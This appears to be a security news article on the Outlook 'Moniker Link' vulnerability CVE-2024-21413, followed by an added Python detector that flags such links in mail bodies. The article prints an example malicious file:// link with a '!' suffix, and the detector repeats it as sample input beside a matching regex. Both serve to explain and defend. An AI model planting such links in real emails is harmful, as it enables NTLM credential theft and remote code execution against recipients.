
The warning refers to the CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability discovered last year by Check Point Research experts. The bug affects a number of Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
The security hole results in remote code execution when an e-mail with malicious links is opened using a vulnerable version of Microsoft Outlook. Successful exploitation of this vulnerability enables an attacker to bypass the Office Protected View and open malicious Office files in edit mode.
Such attacks can result in the leaking of local NTLM credentials and remote code execution (RCE).
Importantly, the Preview Pane can also be used as an attack vector since CVE-2024-21413 can be exploited when malicious documents are previewed.
The vulnerability, dubbed Moniker Link by Check Point Research analysts, makes it possible to bypass Outlook protection against malicious links embedded in emails by using the file:// construct. All the attacker has to do is add a ! character to the URL that points to an attacker-controlled server.
The exclamation mark is added immediately after the document extension along with arbitrary text (Check Point Research used the word “something” in its example):
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Such a link bypasses Outlook restrictions, and Outlook gains access to the remote resource \\\ when the link is clicked. Importantly, no warnings or errors are displayed.
According to the experts, the vulnerability is related to the MkParseDisplayName API and can affect other software that uses it.
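A defender-side check for the link shape described above, as an added example that is not part of the original article: it scans an HTML mail body for file: links whose target is followed by ! and extra text. The function names and the sample body are constructed for illustration; the percent-decoding step is a defensive normalisation, not a statement about how Outlook parses links.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# file: link whose target (ending in an extension) is followed by "!" and
# extra text, the shape shown in the article: ...\test.rtf!something
MONIKER_RE = re.compile(
    r"^file:[/\\]*(?P<target>[^!]+\.[A-Za-z0-9]{1,8})!(?P<suffix>.*)$",
    re.I | re.S,
)

# Constructed sample mail body: the article's link plus two benign links.
SAMPLE_BODY = r"""
<p>Quarterly report attached.</p>
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
<a href="https://example.com/report.rtf">web copy</a>
<a href="file:///\\fileserver\share\notes.rtf">internal share</a>
"""


class _HrefCollector(HTMLParser):
    """Collect href values from <a> tags in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def find_moniker_links(html_body):
    """Return one finding per file: link that carries a '!' suffix."""
    collector = _HrefCollector()
    collector.feed(html_body)
    findings = []
    for href in collector.hrefs:
        m = MONIKER_RE.match(unquote(href.strip()))  # normalise %21 etc.
        if not m:
            continue
        target = m.group("target").replace("/", "\\")
        host = target.split("\\", 1)[0]  # server name for a UNC path
        findings.append({"href": href, "host": host, "target": target,
                         "suffix": m.group("suffix")})
    return findings


if __name__ == "__main__":
    for finding in find_moniker_links(SAMPLE_BODY):
        print(finding)
```

The host field of each finding is the value to compare against outbound SMB connection logs when triaging a flagged message.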
As CISA reports, the security hole is actively exploited and has been added to the Known Exploited Vulnerabilities (KEV) catalog.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” – CISA.
